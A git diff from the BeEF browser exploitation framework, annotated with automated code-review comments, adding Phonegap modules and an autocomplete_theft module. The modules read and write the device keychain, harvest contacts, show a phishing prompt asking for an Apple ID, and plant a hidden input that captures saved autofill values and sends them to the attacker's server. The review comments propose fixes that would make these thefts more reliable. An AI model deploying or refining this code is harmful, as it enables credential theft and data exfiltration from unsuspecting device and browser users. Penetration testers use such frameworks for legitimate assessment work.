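Review bot: The guard `if (kc !== undefined)` at the end of the hunk never blocks, because `kc` is initialised to `''` and stays a string when `cordova.require` throws, so on that path the module reports 'Unable to access keychain plugin' and then still calls `kc.getForKey`/`kc.setForKey`/`kc.removeForKey` on a string, raising a TypeError. Add `return;` after the `beef.net.send` in the catch block, or test `if (kc)` instead. Two smaller points: the `win` callback in onGet takes a parameter named `value` that shadows the outer `value` variable, and every `result` is appended as `'result='+result` without `encodeURIComponent`, so a stored value containing `&` or `=` is truncated server-side. The `<%== ... %>` interpolations write operator-supplied strings raw into JS string literals, so a double quote or backslash in servicename, key or value makes the whole command fail to parse; escaping them server-side (for example JSON-encoding the value) would make the module robust to its own inputs.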
@@ -0,0 +1,53 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Phonegap_keychain
+#
+
+class Phonegap_keychain < BeEF::Core::Command
+
+ def self.options
+ return [{
+ 'name' => 'servicename',
+ 'description' => 'Service name',
+ 'ui_label'=>'Service name',
+ 'value' => 'ServiceNameTest',
+ 'width' => '300px'
+
+ },{
+ 'name' => 'key',
+ 'description' => 'Key',
+ 'ui_label'=>'Key',
+ 'value' => 'TestKey',
+ 'width' => '300px'
+ },{
+ 'name' => 'value',
+ 'description' => 'Value',
+ 'ui_label'=>'Value',
+ 'value' => 'TestValue',
+ 'width' => '100px'
+ },{
+ 'name' => 'action',
+ 'type' => 'combobox',
+ 'ui_label' => 'Action Type',
+ 'store_type' => 'arraystore',
+ 'store_fields' => ['action'],
+ 'store_data' => [['Read'],['CreateUpdate'],['Delete']],
+ 'valueField' => 'action',
+ 'value' => 'CreateUpdate',
+ editable: false,
+ 'displayField' => 'action',
+ 'mode' => 'local',
+ 'autoWidth' => true
+ }]
+ end
+
+ def callback
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+ end
+
+end
diff --git a/modules/phonegap/phonegap_list_contacts/command.js b/modules/phonegap/phonegap_list_contacts/command.js
new file mode 100644
index 000000000..6587811af
--- /dev/null
+++ b/modules/phonegap/phonegap_list_contacts/command.js
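Review bot: `def callback` here (and in phonegap_prompt_user/module.rb later in this commit) differs from the `def post_execute` hook that the other new modules in this commit (phonegap_globalization_status, phonegap_list_contacts, phonegap_plugin_detection) use for the identical body; unless the base class invokes both names, one set of modules never saves its result. Pick one hook name, presumably `post_execute`, across the Phonegap modules. In the `action` option, `editable: false` is the only symbol key in an otherwise string-keyed hash; if the option reader looks up string keys it is silently ignored, so `'editable' => false` matches the rest.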
@@ -0,0 +1,43 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// phonegap_list_contacts +// +beef.execute(function() { + var result = ''; + + function onSuccess(contacts) { + + for (var i=0; i", <%= @command_id %>, 'result='+result ); + + } + }; + + function onError(contactError) { + result = 'fail'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + + + var options = new ContactFindOptions(); + options.filter=""; + options.multiple=true; + var fields = ["displayName", "phoneNumbers", "emails"]; + + navigator.contacts.find(fields, onSuccess, onError, options); + +}); \ No newline at end of file diff --git a/modules/phonegap/phonegap_list_contacts/config.yaml b/modules/phonegap/phonegap_list_contacts/config.yaml new file mode 100644 index 000000000..7b4e28cff --- /dev/null +++ b/modules/phonegap/phonegap_list_contacts/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# phonegap +# +beef: + module: + phonegap_list_contacts: + enable: true + category: "Phonegap" + name: "List Contacts" + description: "Examine device contacts." + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_list_contacts/module.rb b/modules/phonegap/phonegap_list_contacts/module.rb new file mode 100644 index 000000000..e892b491a --- /dev/null +++ b/modules/phonegap/phonegap_list_contacts/module.rb 
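Review bot: `onError` discards `contactError` and reports only `'fail'`, so the operator cannot tell a permission denial from an unsupported API; `result = 'fail: ' + contactError.code;` keeps the Cordova error code. The `};` after the `onSuccess` and `onError` function declarations are stray empty statements and should be `}`. The body of onSuccess's loop is not legible in this view, so the per-contact formatting and how many times it calls `beef.net.send` could not be reviewed.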
@@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# // phonegap_list_contacts + +class Phonegap_list_contacts < BeEF::Core::Command + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + end +end diff --git a/modules/phonegap/phonegap_list_files/command.js b/modules/phonegap/phonegap_list_files/command.js index 14bdd0406..9ba1ca42f 100644 --- a/modules/phonegap/phonegap_list_files/command.js +++ b/modules/phonegap/phonegap_list_files/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // phonegap_upload // beef.execute(function() { diff --git a/modules/phonegap/phonegap_list_files/config.yaml b/modules/phonegap/phonegap_list_files/config.yaml index a4a20c709..fa4fc0b1a 100644 --- a/modules/phonegap/phonegap_list_files/config.yaml +++ b/modules/phonegap/phonegap_list_files/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_list_files/module.rb b/modules/phonegap/phonegap_list_files/module.rb index 51cff073c..4cba7f962 100644 --- a/modules/phonegap/phonegap_list_files/module.rb +++ b/modules/phonegap/phonegap_list_files/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # 
diff --git a/modules/phonegap/phonegap_persist_resume/command.js b/modules/phonegap/phonegap_persist_resume/command.js index 39bb9ed7e..232a7f279 100644 --- a/modules/phonegap/phonegap_persist_resume/command.js +++ b/modules/phonegap/phonegap_persist_resume/command.js @@ -1,17 +1,8 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ // // persist on over app's sleep/wake events diff --git a/modules/phonegap/phonegap_persist_resume/config.yaml b/modules/phonegap/phonegap_persist_resume/config.yaml index 0d08526ab..6ee1f0f6e 100644 --- a/modules/phonegap/phonegap_persist_resume/config.yaml +++ b/modules/phonegap/phonegap_persist_resume/config.yaml 
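Review bot: The new header in phonegap_persist_resume/command.js uses a `/* ... */` block comment, whereas every other command.js header rewritten in this commit (phonegap_geo_locate, phonegap_list_files, phonegap_persistence, the record_audio modules) uses three `//` lines. The text is otherwise identical, so keeping the `//` form here avoids a one-off style in the module tree.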
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # persist on over app's sleep/wake events diff --git a/modules/phonegap/phonegap_persist_resume/module.rb b/modules/phonegap/phonegap_persist_resume/module.rb index bef0ca663..b9bb7d085 100644 --- a/modules/phonegap/phonegap_persist_resume/module.rb +++ b/modules/phonegap/phonegap_persist_resume/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # persist on over app's sleep/wake events 
diff --git a/modules/phonegap/phonegap_persistence/command.js b/modules/phonegap/phonegap_persistence/command.js index 7944fa756..d15797a72 100644 --- a/modules/phonegap/phonegap_persistence/command.js +++ b/modules/phonegap/phonegap_persistence/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // persistence // beef.execute(function() { @@ -35,12 +26,12 @@ beef.execute(function() { function write_file(text) { function fail () { - console.log('write_file fail') + beef.debug('write_file fail') } function gotFileWriter(writer) { writer.onwrite = function(evt) { - console.log("write success"); + beef.debug("write success"); } writer.write(text); } @@ -68,14 +59,14 @@ beef.execute(function() { function read_index(app_name) { function fail () { - console.log('read_index fail') + beef.debug('read_index fail') } function readFile(file) { var reader = new FileReader(); reader.onloadend = function(evt) { - //console.log("Read as text"); - console.log(evt.target.result); + //beef.debug("Read as text"); + beef.debug(evt.target.result); replace_text(evt.target.result); }; reader.readAsText(file); 
@@ -95,14 +86,14 @@ beef.execute(function() { function locate() { function result(entries) { - console.log('result'); + beef.debug('result'); var i; for (i=0; i.app var re = new RegExp(/^[a-zA-Z0-9]*\.app/) var match = re.exec(entries[i].name) if (match) { - console.log('found ' + entries[i].name); + beef.debug('found ' + entries[i].name); // look for ../.app/www/index.html read_index(entries[i].name); @@ -116,11 +107,11 @@ beef.execute(function() { function fail() { - console.log('fail'); + beef.debug('fail'); } function win(entries) { - console.log('win'); + beef.debug('win'); result(entries); } diff --git a/modules/phonegap/phonegap_persistence/config.yaml b/modules/phonegap/phonegap_persistence/config.yaml index 7d449e7c9..b195d0366 100644 --- a/modules/phonegap/phonegap_persistence/config.yaml +++ b/modules/phonegap/phonegap_persistence/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap persistence # diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb index 30face23d..7c262bbe9 100644 --- a/modules/phonegap/phonegap_persistence/module.rb +++ b/modules/phonegap/phonegap_persistence/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap persistenece # @@ -21,6 +11,7 @@ class Phonegap_persistence < BeEF::Core::Command def self.options @configuration = BeEF::Core::Configuration.instance + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port") @@ -28,7 +19,7 @@ class Phonegap_persistence < BeEF::Core::Command 'name' => 'hook_url', 'description' => 'The URL of your BeEF hook', 'ui_label'=>'Hook URL', - 'value' => 'http://'+beef_host+':'+beef_port+'/hook.js', + 'value' => proto + '://'+beef_host+':'+beef_port+'/hook.js', 'width' => '300px' }] end diff --git a/modules/phonegap/phonegap_plugin_detection/command.js b/modules/phonegap/phonegap_plugin_detection/command.js new file mode 100644 index 000000000..557566d76 --- /dev/null +++ b/modules/phonegap/phonegap_plugin_detection/command.js 
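Review bot: The added `proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"` in self.options calls `configuration` rather than the `@configuration` instance variable assigned on the line above; inside a class method there is no local or method of that name, so loading this module's options raises a NameError and the hook_url default built in the following hunk is never reached. Change it to `proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"`. The `self.options` method continues outside the hunk.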
@@ -0,0 +1,49 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// phonegap_plugin_detection +// +beef.execute(function() { + var result = ''; + + // Approximate list of plugins, intended to work with Cordova 2.x + var plugins = new Array( + "cordova/plugin/device", + "cordova/plugin/logger", + "cordova/plugin/compass", + "cordova/plugin/accelerometer", + "cordova/plugin/Camera", + "cordova/plugin/network", + "cordova/plugin/contacts", + "cordova/plugin/echo", + "cordova/plugin/File", + "cordova/plugin/FileTransfer", + "cordova/plugin/geolocation", + "cordova/plugin/notification", + "cordova/plugin/Media", + "cordova/plugin/capture", + "cordova/plugin/splashscreen", + "cordova/plugin/battery", + "cordova/plugin/globalization", + "cordova/plugin/InAppBrowser", + "cordova/plugin/keychain" + ); + + for (var i=0; i", <%= @command_id %>, 'result='+result ); + +}); \ No newline at end of file diff --git a/modules/phonegap/phonegap_plugin_detection/config.yaml b/modules/phonegap/phonegap_plugin_detection/config.yaml new file mode 100644 index 000000000..a5a09713e --- /dev/null +++ b/modules/phonegap/phonegap_plugin_detection/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# phonegap_plugin_detection +# +beef: + module: + phonegap_plugin_detection: + enable: true + category: "Phonegap" + name: "List Plugins" + description: "Attempts to guess installed plugins." + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_plugin_detection/module.rb b/modules/phonegap/phonegap_plugin_detection/module.rb new file mode 100644 index 000000000..f9567f8bf --- /dev/null +++ b/modules/phonegap/phonegap_plugin_detection/module.rb 
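Review bot: `var plugins = new Array("cordova/plugin/device", ...)` builds the list through the Array constructor; an array literal `var plugins = [ ... ];` is the idiomatic form and avoids the single-argument ambiguity of `new Array(n)`. The detection loop that follows the list is not legible in this view, so how each `cordova.require` failure is handled and how often `beef.net.send` is called could not be reviewed.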
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# // phonegap_plugin_detection
+
+class Phonegap_plugin_detection < BeEF::Core::Command
+ def post_execute
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+ end
+end
diff --git a/modules/phonegap/phonegap_prompt_user/command.js b/modules/phonegap/phonegap_prompt_user/command.js
new file mode 100644
index 000000000..b539e9b65
--- /dev/null
+++ b/modules/phonegap/phonegap_prompt_user/command.js
@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_prompt_user
+//
+beef.execute(function() {
+ var title = "<%== @title %>";
+ var question = "<%== @question %>";
+ var ans_yes = "<%== @ans_yes %>";
+ var ans_no = "<%== @ans_no %>";
+ var result = '';
+
+
+ function onPrompt(results) {
+ result = "Selected button number " + results.buttonIndex + " result: " + results.input1;
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+ }
+
+ navigator.notification.prompt(
+ question,
+ onPrompt,
+ title,
+ [ans_yes,ans_no]
+ );
+
+});
diff --git a/modules/phonegap/phonegap_prompt_user/config.yaml b/modules/phonegap/phonegap_prompt_user/config.yaml
new file mode 100644
index 000000000..f1e212eae
--- /dev/null
+++ b/modules/phonegap/phonegap_prompt_user/config.yaml
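Review bot: `results.input1` in onPrompt is free text typed by the device user, and it is appended to the request as `'result='+result` without encoding, so an answer containing `&`, `=`, `+` or `#` is cut or altered before it reaches the module's result handler; use `'result=' + encodeURIComponent(result)`. `results.buttonIndex` is reported as a bare number, and Cordova's notification.prompt reports a zero index when the dialog is dismissed without pressing a button (to be confirmed against the plugin version in use), so naming that case in the result string would make the record unambiguous. The four `<%== ... %>` interpolations also write operator-supplied strings unescaped into JS string literals, so a quote or backslash in the title or question breaks the command's syntax.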
@@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_prompt_user +# +beef: + module: + phonegap_prompt_user: + enable: true + category: "Phonegap" + name: "Prompt User" + description: "Ask device user a question" + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_prompt_user/module.rb b/modules/phonegap/phonegap_prompt_user/module.rb new file mode 100644 index 000000000..2aa3a373e --- /dev/null +++ b/modules/phonegap/phonegap_prompt_user/module.rb @@ -0,0 +1,46 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_prompt_user +# + +class Phonegap_prompt_user < BeEF::Core::Command + + def self.options + return [{ + 'name' => 'title', + 'description' => 'Prompt title', + 'ui_label'=>'Title', + 'value' => 'Apple ID', + 'width' => '300px' + + },{ + 'name' => 'question', + 'description' => 'Prompt question', + 'ui_label'=>'Question', + 'value' => 'Please enter your Apple ID', + 'width' => '300px' + },{ + 'name' => 'ans_yes', + 'description' => 'Prompt positive answer button label', + 'ui_label'=>'Yes', + 'value' => 'Submit', + 'width' => '100px' + },{ + 'name' => 'ans_no', + 'description' => 'Prompt negative answer button label', + 'ui_label'=>'No', + 'value' => 'Cancel', + 'width' => '100px' + }] + end + + def callback + content = {} + content['Result'] = @datastore['result'] + save content + end + +end diff --git a/modules/phonegap/phonegap_start_record_audio/command.js b/modules/phonegap/phonegap_start_record_audio/command.js index 503fc606d..9df2a9a08 100644 --- a/modules/phonegap/phonegap_start_record_audio/command.js +++ b/modules/phonegap/phonegap_start_record_audio/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // exploit phonegap // beef.execute(function() { diff --git a/modules/phonegap/phonegap_start_record_audio/config.yaml b/modules/phonegap/phonegap_start_record_audio/config.yaml index 28e228adc..8ceaa385c 100644 --- a/modules/phonegap/phonegap_start_record_audio/config.yaml +++ b/modules/phonegap/phonegap_start_record_audio/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # 
diff --git a/modules/phonegap/phonegap_start_record_audio/module.rb b/modules/phonegap/phonegap_start_record_audio/module.rb index 1a24663cb..ac955617c 100644 --- a/modules/phonegap/phonegap_start_record_audio/module.rb +++ b/modules/phonegap/phonegap_start_record_audio/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_stop_record_audio/command.js b/modules/phonegap/phonegap_stop_record_audio/command.js index 0463a023c..589f76a73 100644 --- a/modules/phonegap/phonegap_stop_record_audio/command.js +++ b/modules/phonegap/phonegap_stop_record_audio/command.js 
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // exploit phonegap
 //
 beef.execute(function() {
diff --git a/modules/phonegap/phonegap_stop_record_audio/config.yaml b/modules/phonegap/phonegap_stop_record_audio/config.yaml
index 5737fa722..71ea3b389 100644
--- a/modules/phonegap/phonegap_stop_record_audio/config.yaml
+++ b/modules/phonegap/phonegap_stop_record_audio/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_stop_record_audio/module.rb b/modules/phonegap/phonegap_stop_record_audio/module.rb
index f1022c7f2..ec9d916ba 100644
--- a/modules/phonegap/phonegap_stop_record_audio/module.rb
+++ b/modules/phonegap/phonegap_stop_record_audio/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/social_engineering/autocomplete_theft/command.js b/modules/social_engineering/autocomplete_theft/command.js
new file mode 100644
index 000000000..7527b72a8
--- /dev/null
+++ b/modules/social_engineering/autocomplete_theft/command.js
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ steal_autocomplete = function() {
+
+ var results = [];
+
+ // hijack keys and set focus
+ get_autocomplete = function (){
+ window.addEventListener("keydown",function(e){
+ switch(e.keyCode) {
+ case 37: // left
+ scrollTo(window.pageXOffset-20, window.pageYOffset);
+ break;
+ case 38: // up
+ scrollTo(window.pageXOffset, window.pageYOffset-20);
+ break;
+ case 39: // right
+ scrollTo(window.pageXOffset+20, window.pageYOffset);
+ break;
+ case 40: // down
+ scrollTo(window.pageXOffset, window.pageYOffset+20);
+ break;
+ default:break;
+ }
+ },false);
+ document.getElementById("placeholder").focus();
+
+ }
+
+ inArray = function(el, arr){
+ for (var i = 0;i < arr.length;i++)
+ if (el===arr[i])
+ return true;
+ return false;
+ }
+
+ steal = function(n,v) {
+ var val = JSON.stringify({'input':n,'value':v});
+ if (v != "" && !inArray(val,results)){
+ results.push(val);
+ beef.debug("[Module - autocomplete_theft] Found saved string: '" + val + "'");
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
+ }
+ }
+
+ tt = function(ev) {
+ if (ev.keyCode == 37 || ev.keyCode == 39) setTimeout(function(){ ev.target.blur(); },100);
+ }
+
+ // create hidden input element
+ input = document.createElement('input');
+ input.setAttribute("id", "placeholder");
+ input.setAttribute("name", "<%= @input_name %>");
+ input.setAttribute("style", "position:relative;top:-1000px;left:-1111px;width:1px;height:1px;border:none;");
+ input.setAttribute("type", "text");
+ input.onkeyup = function(event) { tt(event); }
+ input.onkeydown = function(event) { tt(event); }
+ input.onblur = function(event) { steal(this.name,this.value);var o=this;setTimeout(function(){ o.focus();},100);this.value = "";document.body.removeChild(this); }
+
document.body.appendChild(input);
+
+ // steal autocomplete
+ get_autocomplete();
+
+ }
+
+ setTimeout("steal_autocomplete();", 100);
+
+});
+
diff --git a/modules/social_engineering/autocomplete_theft/config.yaml b/modules/social_engineering/autocomplete_theft/config.yaml
new file mode 100644
index 000000000..b79eac020
--- /dev/null
+++ b/modules/social_engineering/autocomplete_theft/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ steal_autocomplete:
